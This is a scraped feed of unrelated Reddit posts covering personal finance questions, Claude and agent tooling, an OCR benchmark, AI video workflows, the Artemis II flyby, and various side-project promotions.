Pay $3000 annually into policy

$400K death benefit

10+ years old

$111K surrender value

No surrender charge

Expense charges, COI, Rider charges, annual admin fees are $2469

$531 annually to funds invested sub-accounts

VUL 6

Pay $8400 annually into policy

$400K death benefit

1 years old

$0 K surrender value

$8K surrender charge

Expense charges, COI, Rider charges, annual admin fees are $3588

$4812 annually to funds invested sub-accounts

Roth IRAs - we are no longer able to fund these as we exceed income limits

Roth 1 - 189K

1.25% monthly Asset Management Fee (about $2508 annually at present value)

Plus 4-6% front load on all subaccount transactions and expense ratios very from .67 to 1.2%

Roth 2 - $155K

1.25% monthly Asset Management Fee (about $2058 annually at present value)

Plus 4-6% front load on all subaccount transactions and expense ratios very from .67 to 1.2%

Traditional IRA - $28K blance, have not put any money in this in years.

Ameriprise charges $75 annual custodial fee but generously "refunds" this back to me.

Ameriprise 1 brokerage account - $100 annually

Annual Financial Planning Service - $1100

By may math, I am basically paying ~2.25% AUM on the $511K portfolio and this 2.25% DOES NOT include the sales load and expense ratio charges for subaccount active management.

What do you all think? Don't hold back, I already know I am an idiot for staying with guys. Oh, and their proprietary funds consistently underperform and fail to beat inflation in many cases. Am I this guy's cash cow, or one of many anyway?

r/ClaudeAI One-Tradition-863

I built an open-source tool that reverse-engineers automation flows from screenshots

I kept screenshotting ManyChat flows from other creators… then spending 20 minutes trying to figure out how to actually rebuild them.

So I built a Claude Code toolkit that does it for me.

You screenshot any automation (ManyChat flow builder, DM conversations, GHL workflows, n8n, Make), and it outputs:

  • strategy breakdown
  • flow map
  • step-by-step build instructions
  • all message copy
  • backend checklist (tags, fields, logic)

It uses Claude’s native vision to read the screenshots — no OCR or third-party APIs. Just multimodal analysis + 8 reference files that map UI elements across platforms.

Core skills:

  • /flow-capture → screenshot in, rebuild guide out
  • /flow-adapt → rewrite any flow for your business
  • /flow-audit → 10-point diagnostic
  • /flow-templates → 8 pre-built flow types
  • plus: /flow-library, /flow-batch, /flow-export, /flow-setup

Everything saves to Airtable so your flow library compounds over time.

It’s free, MIT license. Only needs Claude Code + a free Airtable account.

GitHub: github.com/seancrowe01/flow-heist

Would love feedback — especially if anyone tries it on non-ManyChat platforms.

(I’ve tested ManyChat the most so far, but the reference files also cover GHL, n8n, Make, and Zapier.)

r/meme Stock_Crazy6759

Bro didn’t study science… he became science 🤓

r/ClaudeAI proxypassport

Help please! Claude VM disk size nearly full. How can I expand the space? If I clean up won’t I hit this issue all over again?

I’m mostly on CoWork and running basic research, outbound queries and building some hobby apps. I’m on the Max Plan and have no idea what this error means. It’s been 3 weeks since I got on the Max plan. All the details are in the images, has anybody else encountered these?

r/space ChiefLeef22

REMINDER: In just 1 hour from now, NASA coverage of Artemis II's historic Moon Flyby will begin. Join us all live in our r/space Artemis II MEGATHREAD (pinned at the top of the subreddit) to share in the discussion and excitement of this monumental occasion!

Yes - the above is a real picture from just the last hour!

In just under an hour from now (1 PM Eastern Time), NASA will begin live coverage of the historic lunar flyby of Artemis II - and the farthest humans have ever gone in space (breaking Apollo 13's record).

Make sure to join in as everyone follows and discusses this historic event live in our Artemis II MEGATHREAD - https://www.reddit.com/r/space/comments/1s9qfc7/megathread_artemis_ii_launch_to_the_moon/

r/whatisit Archdeacon_Airplane

Who Is This Guy?

Spotted in Culebra Puerto Rico. About two inches long with pretty extreme 'don't fuck with me' energy. It has a tail that is constantly wagging. What's he up to?

r/SideProject Anon081

I stopped trying to “be disciplined” with money. this worked better

I used to think managing money was about being disciplined.

Track everything. Stay consistent. Review regularly.

In reality, I’d do it properly for a few days, maybe a week, then miss a couple entries and the whole thing would fall apart.

Not because I didn’t care, just because life isn’t that structured.

Expenses come from everywhere. Cards, cash, random receipts, subscriptions you forget about. Trying to keep it all perfectly updated never lasted for me.

So instead of trying to be more disciplined, I changed the approach.

I focused on making it easy enough that I don’t avoid it.

Now I just capture things as they happen. Receipts get scanned in seconds, statements can be uploaded if I miss something, and instead of digging through transactions I just ask simple questions like how much did I spend on food or where most of my money went.

That shift made a bigger difference than any budgeting method I tried.

Also important for me, I didn’t want to connect bank accounts or deal with data being shared around. So everything stays on the device.

I built this into a tool I’ve been using daily.

If you’re open to trying something like this once, I’d really appreciate your honest feedback
https://www.expenseeasy.app/scan

There’s a quick demo here if you want to see how it works to chat with personal assistant
https://www.youtube.com/shorts/UlpK7T4kXd4

I’m trying to build this around real usage, not theory. So if something feels pointless or missing, I’d rather hear that than compliments

r/mildlyinteresting your_local_squirrels

Water carton

r/AI_Agents Prajwalraj2

Best framework for building Agentic AI Solution

I am planning to build an advanced AI Product.

If you guys have built or currently building AI solutions, please let me know which one works best ( mostly for complex tasks)

- LangGraph
- CrewAI
- AutoGen
- Agno

Or if any other framework or solutions..!!

r/SideProject CutOk3283

Freepik Promo Code 2026 – Does the 90% Discount Still Work? (Real test)

Hey, I was actually looking for a working promo code for Freepik before upgrading to Premium, but honestly most of the coupon sites I found were either outdated or just didn’t work.

So I decided to test everything myself instead of relying on random “90% OFF” pages.

Here’s what I found:

Most Freepik promo codes are expired or invalid

Some show discounts but disappear at checkout

A lot of coupon websites are just recycled listings

But then I noticed something interesting… It’s not really about promo codes anymore When I tested different ways of accessing the platform, I didn’t enter any coupon manually.

The discount was already applied when I reached the checkout page.

So it looks like Freepik might be using a link-based or referral activation system instead of traditional codes.

My result:

No coupon entered

Discount applied automatically

Final price visible before payment

Not sure if this works for everyone, but it definitely worked during my test.

Question

Has anyone else experienced this?

Are promo codes still working for you, or is it all based on how you access the site now?

(Optional – only if someone asks) I can share the exact method I used if anyone wants to test it.

r/Rag softwaredoug

Is grep all you need for RAG?

Hey all, I'm curious what you all think about mintify's post on grep for RAG?

Seems the emphasis is moving away from vectors + chunks to harness design. The retrieval tool matters - only up to a point. What's missing from most teams in my experience is an emphasis on harness design. Putting in the constraints needed so an agent produces relevant results.

Instead they go nuts and spend $$ on 10B vectors in a vector DB. Probably they have some dumb retrieval / search solution they could start with and make decent progress.

That's what I blogged about here. Feedback welcome.

r/me_irl Beginning_Book_2382

me_irl

r/SideProject Less-Bite

Day 10 of sharing stats about my SaaS until I get 1000 users: Founders are apparently grinding on Saturday nights and Sunday afternoons

I was looking at the engagement heatmap for purplefree and it's kind of depressing. I expected Tuesday or Wednesday mornings to be the peak for lead generation. Instead, the biggest spikes are Sunday at 2pm UTC and Saturday night around 8pm to 10pm.

It looks like people are using their weekends to hunt for customers because they're probably working day jobs or stuck in meetings during the week. On Saturday at 8pm, I had 246 active engagements. Compare that to Monday at the same time which only had 72. It's a 3x difference.

Even Sunday afternoon is busy with 258 engagements at 2pm. I'm seeing this across the board. People aren't just signing up, they're actually digging through matches when they should probably be touching grass. It makes me realize that for a lot of us, lead gen isn't a during work task, it's a when I finally have a second to breathe task.


Key stats: - 258 engagements on Sunday at 14:00 UTC compared to just 67 on Monday at the same time - Saturday night peaks between 20:00 and 22:00 UTC with over 240 engagements per hour - Engagement drops by nearly 70 percent during the standard Monday morning work block - 156 total users are mostly active during hours when traditional sales teams are offline


156 / 1000 users. Still a long way to go.

Previous post: Day 9 — Day 9 of sharing stats about my SaaS until I get 1000 users: My users are lead-generation voyeurs

r/StableDiffusion infearia

FLUX.2 [dev] (FULL - not Klein) works really well in ComfyUI now!

ComfyUI has recently added low-VRAM optimizations for larger models. So, I decided to give FLUX.2 [dev] another try (before, I could not even run it on my system without crashing).

My specs: RTX 4060Ti 16GB + 64GB DDR4 RAM.

And I'm glad I did! Dev is still much slower than Klein for me (75s vs. 15s) - which will probably remain my main daily driver for this reason alone - but it achieves the BEST character consistency across all OSS models I've tried so far, by a large margin! So, if you need to maintain character consistency between edits, and prefer to not use paid models, I highly recommend adding it to your toolbox. It's actually usable now!

Important details:

I'm using my own workflow with a custom 8-step turbo merge by silveroxides (thank you, beautiful human!), since adding the LoRA separately causes a massive slowdown on my system. Feel free to check it out below (it supports multiple reference images, masking and automatic color matching to fix issues with the VAE):

https://github.com/mholtgraewe/comfyui-workflows/blob/main/flux_2-dev-turbo-edit-v0_1.json

(Download links to all required files and usage instructions are embedded in the workflow)

r/ClaudeCode Rutvikk

Claude per day use sharing

I have started a claude sharing where for 1 day you can use my 20x plan as you'd like (I'll be using as well but only at most 5x-10x, the rest is yours to use as you'd like)

r/AI_Agents SignificantClub4279

What if your OpenClaw agent could do more than update you on the weather — proactively, while you sleep?

There's no question OpenClaw has been a revolutionary product — transforming the agentic world at a scale and scope many thought impossible. Even for those watching from the sidelines, the enthusiasm with which it was greeted was infectious. But then the reviews came in. The videos. The threads on this sub. And the early excitement quietly settled — not because the product failed to deliver, but because the expectations of many people, myself included, didn't quite match what it was built for. Ordinary people and indie hackers found it exciting but not immediately useful for them.

"OpenClaw, what's the weather?" and "OpenClaw, answer my grandma's email" weren't exactly the pressing problems we needed solved. We already have weather apps. And honestly? Answering the handful of messages we get from friends and family every day is one of the small joys of life — I'd never hand that off to an AI agent, and I suspect most of you wouldn't either.

For established businesses drowning in hundreds of daily emails, or influencers managing massive audiences, OpenClaw was everything they wished for. But most of us aren't there yet. And that's exactly where the enthusiasm and the reality collided.I watched this disconnect play out on this sub day after day. Members voicing the same frustration. The same vibe echoing across social media. It wasn't just noise — it was a real, shared problem. It affected me personally too.

So I asked myself: what if I built a plugin that turns OpenClaw from an email nanny into a 24/7 lead bounty hunter? One with a swarm of AI judges watching over it — making sure it operates within the bounds of social media rules and my own standards. No spam. No embarrassing cold messages. Just high-intent signals, reviewed by me before anything goes out.

So I built SignalPipe — the first agentic sales pipeline for OpenClaw. It monitors Reddit, Hacker News, and RSS feeds around the clock for people actively looking for what you sell. Every signal goes through a 4-stage filter before it ever reaches you, including a sarcasm detection step (yes, really — it matters more than you'd think). The ones that pass get a drafted reply ready for your approval. You approve, it sends. Nothing goes out without your say.

Once you've set it up, just ask your agent: "Find me buyers" — and take a nap. When you wake up: "Show me the leads" — approve the ones you like, skip the rest, and let SignalPipe handle the follow-up.

Thanks in advance, everyone. Happy to answer any questions — shoot them below.

r/whatisit JLV00

Weird Rock Formation in Woods of New Haven County, CT

I went on a hike about a month and a half ago and I forgot to post these pictures. It's of a bunch of rocks in a two concentric circles with a small gap in front, with a little piece of glass/metal that looks like a candle holder on top. The second picture is a large hole that was found maybe 20 feet from the formation that could've been where the rocks came from. What do we think this is? My dad was thinking maybe a crystal farm of some sort, as some of the rocks were split open and had yellowish crystals inside, but why go through the trouble to arrange the rocks in such manner? My initial thoughts were some sort of burial shrine, maybe for a pet (especially because of the little candle holder thing), but that's a lot of trouble to go through, especially because I can't imagine it's very easy to get an excavator in here. There's a park with some baseball fields and stuff about a half a mile through the woods, and also some power line towers in the area, so maybe it's possible, but this site had to be about a quarter of a mile from the nearest one, and also down a steep hill. Let me know what you all think!

r/personalfinance Ok_Development7589

Having difficulty with credit bureaus...

When I was born my parents put a credit freeze on all of my credit files due to potential breaches. Now, I just recently turned 18 and I'm trying to unfreeze my credit to get a new phone to my name... but I can't. We've tried to contact all of the credit bureaus but none of them have given us a clear answer on how to actually go about doing this. I believe TransUnion was the only bureau I had actually been able to create an account with and freeze my credit. Equifax hasn't responded to anything that we've sent through the mail, and every time we call we are told different ways to go about doing this. I've recieved the same letter from Experian stating that my credit file already has a freeze, but i don't know where that is and how to access it. I also have not been able to get a real person on the phone with Experian, just automated messages. If anyone else has experienced this problem and figured out the way to solve this, please help me!

r/ClaudeCode MustafaEminn__

No wonder I keep hitting usage limits

Sonnet 4.6 High thinking. VS Code extension

r/aivideo ovninoir

Zanita Kraklëin - Tombola

r/metaldetecting Welsh_Pirate_

A video showing my best Roman finds from wales :)

Some of my best Roman finds from wales 🏴󠁧󠁢󠁷󠁬󠁳󠁿 Re-uploaded without the end bit

r/personalfinance ScienceHDMI123

Seeking feedback on financial planning for higher incomes, but have a chronic saver mentality.

My wife and I both grew up middle class, very typical for NE USA. We are now married, recently bought a home, and are planning to have kids in the near future. Our budget seems pretty solid - beyond thankful most of budgeting is for WANTS and SAVING and not NEEDS.

I am a chronic saver, though. I have a hard time spending money on WANTS and default to SAVING with the thought of long-term investing, compounding, etc., deferring current enjoyment for future safety and benefit.

Financial overview:

  • My income: ~250k
  • Wife income: ~170k

  • 401k: Annual Maxed

  • My HSA: Annual Maxed

  • Roth IRA: Not started yet

  • Monthly Net Income after tax/benefit/401k : ~$17000

Major Monthly Expenses:

  • Mortgage PITI: $6,300 (28 years remaining, 730k, 6%)
  • Student Loans: $1000 or so (some coming out of forbearance)
  • Cars: $500 @1.9% - 1 more year left (Car worth 32k)
  • Food: $1000-$1500

There's obviously some other expenses that fluctuate a bit, but we have about $7000 left after all monthly expenses.

What I am struggling with is mainly -- How to allocate this extra money?

I understand it's a very good "problem" to have, but I am struggling to actually spend money for pleasure or want, especially growing up not in this type of situation. Obviously Roth IRA can be funded backdoor, and I am planning for that. Also planning on about two kids, so keeping that in mind as well.

  • 401k: About ~300k between us both
  • HSA: About 24k, invested in SP500
  • Cash: About 70k, 50k in FDLXX

Any advice? Good? Bad? Thing I'm not thinking of? Overthinking?

I really am mostly looking to optimize my financial planning to a degree where I don't need to be second guessing spending on things we want to do, places we want to go, home upgrades, etc.

r/LocalLLaMA Interesting_Let_2226

Getting experience with Ollama and cloud based models

I have been trying to get experience with Ollama (llama3.2 and mistral) for some time. At some point I got the idea wrapping the models in a REST API and a REACT GUI. And got it deploy on a cloud provider. I likely read that someone else had done that :-)

Since I mostly have backend developer experience to installed ChatGPT Codex in my VSCode. Codex probably wrote 90% of both the frontend and backend code. And did 90% of the DevOps work.

I now have Web GUI where I can compare prompts and responses against several local models.

I’m curious — how are you all benchmarking / comparing models locally?

r/whatisit ClerkRepulsive5162

What is this object called, and what is it used for. I care to know.

r/mildlyinteresting WorstNatalie2

Demogorgon Lemon!

r/ClaudeAI Present_Scientist995

Best bank account for agents?

Been trying to find a way to let my Claude agent handle basic banking stuff like paying invoices and managing expenses without me having to log into a dashboard every time. Is anyone doing this yet or is it still too early? Every bank I look at seems like it was built for humans clicking buttons not agents making API calls

r/me_irl PeakPointFitness

me irl

r/whatisit deezmfnuts67

Weights?

I found these random iron plates on my rims. I recently got my tires changed but the guy was really nice and I’m scared of all the kidnappings and whatnot in my area. Does anyone know what this is and why its on my rim? Its only in one rim…

r/whatisit New_Analyst_6764

Squishy toy from Easter

All the other squishes I was putting in eggs were like chicks or bunnies, but I and every else I asked had no idea what its meant to be

Btw it’s like a flat image

r/aivideo Eastern-Ad9515

The Ascent — Prologue to BREACH, a 13-Episode Sci-Fi Anthology

r/Jokes txorfeus

Sin vs. Shame

It's a sin to put it in, it's a shame to take it out.

r/ProgrammerHumor krexelapp

myKeyboardTeachingMeTenses

r/painting aliburak25

Acrylic figure study

r/meme Fickle-Butterfly-338

One of them is me...

r/ClaudeAI soulep

Macropad shortcuts for Claude

Is anyone using macro pads for their Claude workflow? I primarily use Cowork and Chat rather than Code but I’m curious if others are using macropads with Claude and what you’re mapping to them.

r/SideProject Maleficent-Lab-8599

I built a dead simple offline receipt maker because I was tired of ugly Canva templates

Hey r/SideProject

Every time I needed to give a client or customer a receipt,

I was stuck using messy Canva templates or overly

complicated tools.

So I built FlashInvo — a super clean, fast receipt maker.

Just upload your logo, add items, and it instantly generates a professional-looking PDF.

No account, no subscription, no branding, and it works completely offline.

It’s simple on purpose.

Would love your honest feedback:

Does the design look professional enough?

Would you actually use this for your business?

Try it here: https://flashinvo.com

Thanks!

r/PhotoshopRequest Accomplished_Pair377

Help with wedding pic edits

🤗 hello I'd appreciate it if I could get some help with my wedding pictures! I was so nervous I couldn't get my hair done the way I wanted I didn't get makeup done and it was cold and windy 😔 I have a big insecurity with my double chin and my hair. I've never liked myself in pictures and I was so nervous for this day I couldn't hardly move to put makeup on and I didn't have a team to help 😔 I'm looking for my chin to be sculpted and lean and my hair to look nice and full and if anyone can put small amount of eye makeup or make my eyes a bit more open. maybe define my waist some and slim me down just a tad. not asking to look totally different but just want to feel beautiful. I really appreciate anyone's help!

r/StableDiffusion jumpingbandit

Can WAN/LTX make such videos locally?

The resolution looks high and the prompt complex. Is it feasable?

r/ClaudeAI shuffles03

Using Claude to write articles in 2026, is my manual process outdated or is it actually fine?

I’ve been building a niche content site for a while now and I want to get an honest read from people here on whether I’m operating like it’s 2019 or whether my approach actually makes sense.

Here’s how I work.

I have a set of reference documents built up over months of iteration. A full article writing prompt, a tone and style guide with banned words and voice rules, an SEO and keyword guide, a branded HTML component design system, brand guidelines, and a master project instructions document that ties everything together.

Different session types use different combinations of these. Article sessions use one set. Component build sessions use another. Each chat has one purpose.

For articles, I paste my documents into a fresh session and give Claude the topic. It comes back with a keyword proposal, gap analysis, and angle before writing anything. I confirm or adjust.

Then we spar.

Claude drafts sections and stops to ask me things. What was my actual experience of this? What’s a specific detail only I would know? I give raw notes and half-finished thoughts and it shapes them into my voice.

The final article has things in it that no competitor can replicate because the knowledge is genuinely mine.

I review everything. I push back when something reads wrong. We go again. This is the part I would never automate.

HTML components are separate sessions entirely. I have a full custom design system, cost tables, stat rows, affiliate CTA boxes, interactive tools. Each one gets its own chat with the relevant documents.

I know nothing about code, genuinely nothing, I don’t use that side of my brain at all. I can only tell if something is wrong visually so Claude has to get it right or we debug by eye.

The place I keep getting stuck is any time I try to build something more systematic. I’ve made several attempts at creating proper workflows and automation, because everything I read suggests that’s the direction things are moving and that pasting documents into chat prompts is essentially archaic at this point.

Terminal, GitHub, Make.com. Every attempt went sideways. I ask the wrong questions because I don’t know what I don’t know.

Sessions drift, something gets built incorrectly, I can’t tell if it’s right because I don’t understand what’s been built, and I eventually scrap it.

Claude has mentioned Cowork and Claude Code as things worth looking at down the line but both feel like more complexity than I can manage right now.

I tried Gemini Pro 3.1 because the usage limits are far more generous than Claude Pro. Fed it my full document set. It couldn’t hold the instructions across a session and drifted into generic positive AI prose, exactly what my tone guide bans.

When I pushed back it actually diagnosed its own failure and said it needs a chained multi-agent workflow to do what Claude does in one session. So that was that.

My philosophy is one good article, not fifty average ones. One brick at a time. The compounding effect of genuinely useful content that ranks and earns trust over time. I’m not trying to produce at volume. I’m trying to produce something actually good.

But reading this subreddit I feel like everyone is running agents, building pipelines, automating multi-model workflows. And I’m sitting here pasting Google Docs into a chat window like it’s 2023.

So the honest question is: in 2026, what do I actually gain from automating the content side? If the usage is roughly the same whether manual or through a pipeline, and the entire value of what I’m building comes from the sparring and the genuine human input, what’s the argument for changing anything?

Is the manual process embarrassingly outdated or is it the right call for content built around a specific voice and knowledge that can’t be generated?

r/SideProject AdilShaikh5786

How many of you are losing revenue due to failed Stripe payments?

I’ve been digging into subscription SaaS metrics and one thing keeps coming up:

Failed payments = silent revenue loss.

Things like:

  1. expired cards
  2. bank declines
  3. users forgetting to update payment

I read that this can cause 10–30% of subscription revenue to fail at some point, which sounds crazy.

Curious from real founders:

Are you actually seeing this in your business? Roughly how much revenue do you think you lose monthly because of failed payments? Are Stripe Smart Retries and emails enough, or still leaving money on the table?

Not selling anything just trying to understand how real this problem is.

r/ChatGPT Orome2

I just lost the last portion of all of my long chats after letting my Plus subscription expire.

Just a warning to others thinking about getting rid of your Plus subscription. Back up all your important work BEFORE it expires!

OpenAI says you won't lose your chats even if you are no longer a paid subscriber. It's bullshit. I think what happened was some of my chats were too long for the free subscriber context window and everything after that got truncated.

There is a lot of context, work, and threads I've been working though for months that just got nuked.

What's even more annoying is chatgpt will gaslight you when you ask about the truncated threads telling you it never happened and say that it can't happen because OpenAI says you "won't lose your chats if you cancel Plus".

r/SideProject jodeedev

I'm 15 and spent the last 18 months building a cross-platform productivity app because the subscription trend felt like a scam.

Hi everyone, I'm a 15-year-old dev and after trying like 10 productivity apps, each of which had an expensive subscription for basic features or was missing a lot of features, I decided to build a completely free alternative from scratch using Kotlin Multiplatform.

It’s called Telic. It’s an all-in-one productivity ecosystem, running on Android, iOS, MacOS and Web.

It can only be completely free, because of the fact that I sync your data through your own Google Drive, which makes my server costs $0. And it also means your data never touches my servers, because I don't have any.

Features:

  • A Connected Ecosystem: Tasks, Habits, Calendar, Gantt charts, and Gamified stats all interconnected in one place.
  • On All Your Devices: Native on iOS, macOS, Android, and even Web.
  • Deep Customization: 10+ palettes, time-based palettes, and heavy UI tweaking to make it feel native to your setup.
  • Smart Features: An optional AI Assistant and QuickAdd functionality.

It's been a huge project and I'm actively pushing updates to fix bugs and improve the features. I’d genuinely appreciate any feedback from other devs! Let me know if anything breaks or you think of any missing features!

r/personalfinance Significant_Home218

Looking for Trusted Aged Care Services for Seniors – Any Recommendations?

I am searching for reliable aged care services that provide professional support, safety, and comfort for elderly family members. I would like to know about services such as daily care assistance, medical support, and personalized care plans. Has anyone had experience with providers like For Purpose Aged Care or similar aged care services? Please share your suggestions, costs, and overall experience.

r/Seattle AffectionateLuck6190

I'm aware this isn't a popular take...

but does anyone else despise the sunny months here like me? I truly feel depressed.

r/AI_Agents Budget-Juggernaut-68

Claude code harness to automate workflow

I'm looking for advise on how to write repeatable workflows for Claude code to better analyze documents and then writing reports for them.

We have internal databases containing various files and documents and I'll like to enable users to better perform research. I would like for Claude code to be the agent harness to conduct the research, and be the first layer of filter.

I've written scripts that enabled it to conduct searches and it is pretty decent at making queries and pulling data. It also is able to pull the right information then writing reports for them.

I'll like it to perform these tasks for different research questions we have and identifying data points that may help us answer those questions. some of this questions are evergreen and we will need to do repeatedly and I'll like to schedule Claude code to perform these tasks.

I'm aware that we can build pipelines ourselves to control how it does the tasks deterministically, but the flexibility will help a lot.

Edit: what kind of plugins would you install/write, should I have custom research agent, database query agent etc?

r/metaldetecting NoGovernment2505

It's so lovely when it's sunny

Sold my Nokta Simplex Ultra and bought this bad boy :)

r/nononono Admirable_North_8969

The Room

r/painting NicksPaintings

"Dream Traveler" acrylic painting by Nick Flook

r/ChatGPT shhdwi

Nanonets OCR-3 vs GPT-5.4 and Gemini 3.1 Pro on document parsing: benchmark comparison across 7 categories

Nanonets just released OCR-3, a 35B (A3B active) MoE model built specifically for document understanding. Here's how it compares to the general-purpose models on actual OCR tasks.

olmOCR Benchmark (7 categories):

Model ArXiv Math H&F Long/Tiny Multi-Col Old Scans Scans Math Tables Overall Nanonets OCR-3 89.2 96.6 93.4 87.6 49.6 88.9 94.2 87.4 GPT-5.4 83.1 — 82.6 83.7 43.9 82.3 91.1 81.0 Gemini 3.1 Pro 70.6 — 90.3 79.2 47.5 84.9 84.9 79.6

OmniDocBench: OCR-3 scores 90.5 vs GPT-5.4 at 85.3 and Gemini 3.1 Pro at 85.3.

The gap is widest on tables (94.2 vs 91.1) and multi-column layouts (87.6 vs 83.7). Old scans are hard for everyone — 49.6 is their worst category, though GPT-5.4 scores 43.9 there.

Interesting detail: an LLM-as-judge analysis on the olmOCR results found 437 of 864 "failures" were evaluator brittleness, not actual model errors. After correcting for that, weighted average goes to 93.1. Has anyone here run similar evaluator audits on OCR benchmarks?

The model is a specialized VLM, not a general-purpose LLM. It does document parsing, schema-based extraction, document splitting/classification, RAG-optimized chunking, and visual QA on documents. Each with bounding boxes and confidence scores.

GPT-5.4 + Nanonets OCR3 with confidence scores and bounding boxes will help in giving superior accuracy in RAG based apps.

Currently working on a RAG indexing framework which I will open-source next week (got 94.5% on Finance bench and 96% on DocLegal bench using this)

r/ClaudeCode omarsmak

How do you get Claude Code to make better architectural decisions?

Hi folks,

I’m using Claude Code on a large monorepo and relying on it heavily for feature work and bug fixes. One thing I’ve noticed is that, when implementing a ticket, it often takes the easiest path rather than the right one architecturally. For example, it may introduce something hacky instead of creating the proper abstraction or interface.

Because I know the codebase well, I can usually catch those design smells during review. But I’m worried that someone less familiar with the system might miss them.

What have you found works best to steer Claude Code toward better architectural decisions instead of quick tactical fixes? I’ve already tried tightening the prompts and creating custom skills, but the results are still not where I want them to be.

Any tips would be much appreciated 👍

r/StableDiffusion yawehoo

Replacing Pee Wee Herman with John Wayne (Wan 2.2)

there are several ways to change one person into another. This is how I do it. This method gives good results but can be a little time-consuming so it is perhaps better suited for bigger projects.

The video uses two methods, one for clips without dialogue, one for clips with dialogue.

First of all I use Pinokio/Wan2.2, so no comfy-workflow, sorry.

  1. So this is for clips without dialogue. I created a Lora of the Replacer (in this case John Wayne
  2. I cloned John Wayne's voice using Fish Audio. But there are so many good voice models out there so I think most of them can handle that.
  3. As I mentioned I use Pinokio and the Wan 2.2 model. Included in the Wan 2.2 model there is the Wan 2.1 model and included in that is the FusioniX model! Phew!

What's good about FusioniX is that it can do masking and it is fairly quick to render.

4) Load in a clip in FusioniX. In 'control video process' choose 'transfer Human Motion and Depth'. In 'Area Processed' choose 'masked Area'. Open the Video Mask Creator (it's on the top of the page). mask out the person you want to replace (in this case Pee Wee Herman).

Since Pee Wee and John Wayne has different body types I expanded the mask quite a bit.

5) Put the Lora of John Wayne in your prompt and be sure to describe him in detail. Hit 'generate'.

And that's it! The result is usually bang on!

6) For clips with dialogue, there is a different method. I take a screenshot of the first frame of the clip. Use the mask on that image to switch out the characters, then use it as a reference image in MultiTalk (also in Wan2.1) together with John Wayne's audio.

So, yeah. Lots of work and one lingering question remains….why?!

r/BrandNewSentence bolshoybooze

40 years later, my family is suing each other to dig up her corpse and move it because 'there's no threesomes in heaven'.

r/me_irl Beginning_Book_2382

me_irl

r/homeassistant greenbeast999

'Sensor Light' blueprint, figuring out how to do something

This blueprint is working great in several rooms. However i'd like to change the bedroom automation so that during 'night hours' ( i have an automation to set those) it triggers on but not off.

If anyone is more familiar with this blueprint and how to achieve this i'd be grateful for help.

r/ClaudeAI Daniel_SES

I built an MCP server that gives Claude long-term SEO memory for your sites

Most SEO tools are built for SEO people. I wanted something that fits how I already work - inside Claude.

So I built SEOLint: an MCP server that connects to Claude Desktop or Claude Code in 2 minutes and gives Claude 7 SEO tools it can call from any conversation.

Here's a demo: https://www.youtube.com/watch?v=RNAr07ZLHFg

The workflow:

  1. get_site_intelligence(domain) - Claude learns what your site is trying to do, who it's for, and what structural patterns exist across all your pages
  2. get_open_issues(domain) - every unresolved issue, labelled NEW / PERSISTING / REGRESSED
  3. Claude fixes it in your codebase
  4. mark_issues_fixed(scanId, ids[]) - memory updated

The memory system is the part I'm most proud of. Every scan is compared to history. Fix something, it closes. Break it again on a future deploy, it shows up as REGRESSED. Claude knows what changed between sessions.

Every issue also includes the actual broken HTML element so Claude can fix immediately without hunting for it.

Setup - add this to your Claude Desktop config:

{ "mcpServers": { "seolint": { "command": "npx", "args": ["-y", "seolint-mcp"] } } } 

Also ships as a CLI and REST API if you want it in GitHub Actions.

Happy to answer questions - built this in a week, still very early.

seolint.dev

r/personalfinance SignificanceDue4908

Probate Lawyer didn't include mother's bank account, wants 350 to add it in

I hired a probate lawyer to handle my mother's estate and he neglected to include her bank accounts and now is wanting about 350 dollars to add them in. She only had about 300 dollars so it doesn't seem worth while, are there any other avenues I can do? I'm in Florida btw.

r/SideProject SteveDraughn

I increased my 10K MAU NFL trivia app’s revenue by ~33% by testing different subscription offers

Around 9 months ago I shipped an NFL trivia app (Gridiron Trivia) and began monetizing it with in-app subscriptions/purchases in July. The business model is pretty similar to New York Times games: offer daily games for free (with ads) and offer collections of games for one-time purchase. Subscribers get the ad-free version and access to all game collections.

The app got to 10K MAU by the end of the NFL season (no ad spend) and now natural growth has started to plateau since the season ended. I decided the best usage of time was to attempt to optimize the in-app purchase strategy to increase LTV, so I ran an experiment for the past 2 months and thought I’d share the results here as my changes ended up making a pretty big difference.

Prior to the experiment, our subscription pricing and basic statistics were as follows:

  • Subscription Pricing: $4.99/mo | $39.99/yr | $59.99 lifetime
  • Split: 80% | 15% | 5%
  • Conversion to Paid: 5.3%
  • Relative LTV: lifetime LTV > yearly LTV >>> monthly LTV.

The goal of the experiment was to test whether providing special pricing to user cohorts increases LTV over the status quo.

Experiment Design: New users were randomly assigned to 1 of 4 groups with equal distribution:

  • Group A: $24.99/yr special offer
  • Group B: $34.99 lifetime special offer
  • Group C: 7-day free trial then $4.99/mo
  • Group D: Control

I used Truflag to manage the experiment:

  • Created a flag that served either A, B, C, or D
  • Created a metric to track user purchases and subscriptions
  • Created an experiment with the flag and metric for 100% of new users with 25/25/25/25 distribution
  • Read the flag using the SDK and pop a modal (after 3 games played) with the special offer (or control)

Experiment Results:

Group Offer Paid conversion Purchase mix Initial revenue impact Expected LTV impact A $24.99/yr special offer 6.4% 58% monthly / 34% yearly / 8% lifetime +50.4% +33.0% B $34.99 lifetime special offer 5.9% 52% monthly / 12% yearly / 36% lifetime +71.3% +31.6% C 7-day free trial then $4.99/mo 8.0% 88% monthly / 9% yearly / 3% lifetime -37.3% +27.6% D Control 5.3% 80% monthly / 15% yearly / 5% lifetime baseline baseline

All 3 groups outperformed the control by over 25% from the LTV perspective*, with a dip in initial user revenue with Group C. The primary metric we cared about was the expected LTV impact, and Group A’s +33.0% improvement over control was the highest.

At least in my case, changing the pricing/offer structure made a much bigger difference than I expected.

Curious what kind of results other people have seen from testing intro discounts, trials, or lifetime offers or if you guys have other ideas for what experiments to run.

*LTV calculations were based on observed user churn for monthly and expected user churn for yearly.

r/aivideo S1NTDNS

Black Art Basel (000000)

r/LocalLLM RebelionFiscal

Is there a model that free from all that user validation & maximazing user engagement crap? I'm tired of it.

I'm simply tired of all that crap. I want a model that simply responds a straight forward prompt without it trying to lick my balls every step of the way by telling me I'm intelligent, I had brilliant idea, or whatever crap it thinks will help it maximize user retention and consumption.

I am also hoping to have a 7-8 billion parameter model that will run just fine on an M2 16gb on the side for basic stuff.

Is it too much to ask for?

I'd truly appreciate if somebody could point me in the right direction. I wasn't able to find anything about this online.

r/SideProject sequencer3488

I turned my notes on Reddit launches into a tool n here's what it generates

posted here a couple days ago about Reddit working way better than PH for me. got a bunch of replies and a few DMs asking if I had the notes somewhere structured.

